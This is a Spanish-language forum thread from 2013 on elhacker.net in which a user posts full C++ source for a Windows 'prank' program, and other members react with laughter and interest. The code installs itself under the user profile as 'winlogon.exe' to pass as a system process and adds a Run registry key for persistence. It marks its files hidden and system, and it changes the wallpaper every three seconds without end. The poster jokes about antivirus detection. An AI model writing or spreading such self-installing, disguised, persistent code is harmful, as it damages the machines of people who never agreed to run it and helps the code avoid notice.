elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  Broma c++
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Broma c++  (Leído 4,710 veces)
daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Broma c++
« en: 24 Mayo 2013, 03:16 am »

hola hice un code para retomar la programacion hacia rato no lo programaba asi que no es nada complejo y para hacer una broma no lo posteo aun por si la remota posibilidad que lo terminen detectando algun antivirus antes de ponerlo
mañana posteo el code xD
fondo:
https://mega.co.nz/#!Lc0T2QRb!dKQBEhZU-rILFaNS7HQah2nnxqAzuVmzeZd6z76ysk4
la imagen debe estar en la misma carpeta y llamarse 1010.bmp


saludos

Código
  1. #include <windows.h>
  2. #include <cstring>
  3.  
  4.  
  5.  
  6. bool existe(char * file) // comprueba la existencia de un archivo si no existe entonces manda false
  7. {
  8. DWORD attr = GetFileAttributes(file);
  9. if(attr == INVALID_FILE_ATTRIBUTES || (attr & FILE_ATTRIBUTE_DIRECTORY))
  10.    return false;   //  not a file
  11. return true;
  12. }
  13.  
  14.  
  15. void instalar(char *DireccionLocal) // lo instala para que se ejecute en inicio de windows
  16. {
  17. //con la variable DireccionLocal se donde esta el programa para asi copiarlo
  18. char instalarFondo[100];
  19. char *dirlocal=getenv("USERPROFILE"); // carpeta local de usuario
  20. char dirfoto[700]; // el directorio donde esta la foto
  21. char instalar1[100]; //directorio a instalar el archivo
  22. //----------------------------
  23. GetCurrentDirectory(700,dirfoto);
  24. strcat(dirfoto,"\\1010.bmp");
  25. strcpy(instalarFondo,dirlocal);
  26. strcat(instalarFondo,"\\1010.bmp");
  27. CopyFile(dirfoto,instalarFondo,true);//copio el fondo
  28. //-------------------------------
  29. strcpy(instalar1,dirlocal);
  30. strcat(instalar1,"\\winlogon.exe");
  31. CopyFile(DireccionLocal,instalar1,true); // copio el archivo
  32. //añado llaves al registro de windows para que se inicie con el sistema
  33. HKEY hkey;
  34. RegOpenKeyEx (HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0, KEY_SET_VALUE, &hkey);
  35. RegSetValueEx (hkey, "windout", 0, REG_SZ,(const unsigned char * ) instalar1, sizeof instalar1); // aca añado el registro  el nombre es windout y el valor la direccion del programa
  36. RegCloseKey  (hkey);
  37. SetFileAttributesA(instalar1,FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM); // osculto el archivo y le marco system para que sea mas dificil de ver
  38. SetFileAttributesA(instalarFondo,FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM);
  39. //---
  40.  
  41.  
  42. }
  43.  
  44. void cambiarElFondo()
  45. {
  46.    char fondo[]="1010.bmp";
  47.    SystemParametersInfo(SPI_SETDESKWALLPAPER,0,fondo,SPIF_UPDATEINIFILE|SPIF_SENDWININICHANGE); // aca cambio el fondo
  48.  
  49. }
  50.  
  51. int main(int argc,char * argv[])
  52. {
  53.    char *com=getenv("USERPROFILE");
  54.    char comprobar[600];
  55.    strcpy(comprobar,com);
  56.    strcat(comprobar,"\\winlogon.exe"); //winlogon el nombre del exe para meter miedo y hacerse pasar por proceso del sistema xD
  57.  
  58.    while(true)
  59.    {
  60.  
  61.    if(existe(comprobar)) //
  62.    {
  63.  
  64.        cambiarElFondo(); //como es bucle infinito cambiara cada 3 segundos el fondo
  65.    }
  66.    else
  67.    {
  68.       instalar(argv[0]); // si no existe el archivo en la carpeta del usuario se instala
  69.    }
  70.       Sleep(3000); // espera 3 segundos
  71.    }
  72.  
  73.    return 0;
  74. }
  75.  


« Última modificación: 24 Mayo 2013, 20:54 pm por daryo » En línea

buenas
amchacon


Desconectado Desconectado

Mensajes: 1.211



Ver Perfil
Re: Broma c++
« Respuesta #1 en: 24 Mayo 2013, 10:48 am »

Lo gracioso sería que se ejecutase al arranque del pc  ;-)


En línea

Por favor, no me manden MP con dudas. Usen el foro, gracias.

¡Visita mi programa estrella!

Rar File Missing: Esteganografía en un Rar
daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: Broma c++
« Respuesta #2 en: 24 Mayo 2013, 12:53 pm »

Lo gracioso sería que se ejecutase al arranque del pc  ;-)
se ejecuta al comienzo del pc  :P
En línea

buenas
BlackM4ster


Desconectado Desconectado

Mensajes: 499


Error, el teclado no funciona. Pulse F1 para continuar


Ver Perfil WWW
Re: Broma c++
« Respuesta #3 en: 24 Mayo 2013, 14:24 pm »

jajajaj
En línea

- Pásate por mi web -
https://codeisc.com
Stakewinner00


Desconectado Desconectado

Mensajes: 1.426



Ver Perfil WWW
Re: Broma c++
« Respuesta #4 en: 24 Mayo 2013, 16:52 pm »

Interesante. Esperare el código para poder jugar un poco. jaja
En línea

BlackM4ster


Desconectado Desconectado

Mensajes: 499


Error, el teclado no funciona. Pulse F1 para continuar


Ver Perfil WWW
Re: Broma c++
« Respuesta #5 en: 24 Mayo 2013, 17:08 pm »

Es sencillito, una imagen, un cambio en el registro y ya xD
En línea

- Pásate por mi web -
https://codeisc.com
daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: Broma c++
« Respuesta #6 en: 24 Mayo 2013, 20:38 pm »

listo ya puse el code  :P
En línea

buenas
Stakewinner00


Desconectado Desconectado

Mensajes: 1.426



Ver Perfil WWW
Re: Broma c++
« Respuesta #7 en: 24 Mayo 2013, 22:57 pm »

Muy interesante. Pensaba que sería más complejo.

Gracias.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
broma bat!!! « 1 2 ... 8 9 »
Hacking
von Newman 88 56,814 Último mensaje 27 Diciembre 2010, 23:42 pm
por von Newman
broma con vb « 1 2 »
Programación Visual Basic
vivachapas 17 5,859 Último mensaje 20 Abril 2007, 23:54 pm
por Ch3ck
Mi proyecto broma en vbs
Scripting
Enemy 7 5,911 Último mensaje 11 Octubre 2008, 23:22 pm
por aaronduran2
broma en c++
Programación C/C++
daryo 3 2,833 Último mensaje 6 Julio 2013, 01:21 am
por lapras
como crear link con broma (joke),estilo broma (ooskar)
Foro Libre
Mamba Negra2 0 4,730 Último mensaje 19 Enero 2014, 11:24 am
por Mamba Negra2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines